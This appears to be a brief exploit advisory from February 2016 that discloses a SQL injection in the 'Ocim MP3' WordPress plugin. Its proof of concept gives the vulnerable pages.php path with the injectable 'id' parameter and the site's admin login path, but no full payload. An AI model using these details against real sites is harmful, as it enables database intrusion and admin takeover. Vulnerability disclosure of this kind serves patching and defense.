======== Ocim MP3 Plugin SQL Injection Vulnerability ========

:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : WordPress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:

Summary
========
Ocim MP3 is a plugin for building an MP3 grabber site based on WordPress.

Proof of Concept
========
Infected URL: http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel: http://[Site]/[Path]/oc-login.php

===========
Thanks to
===========
All Indonesian Hacker!!!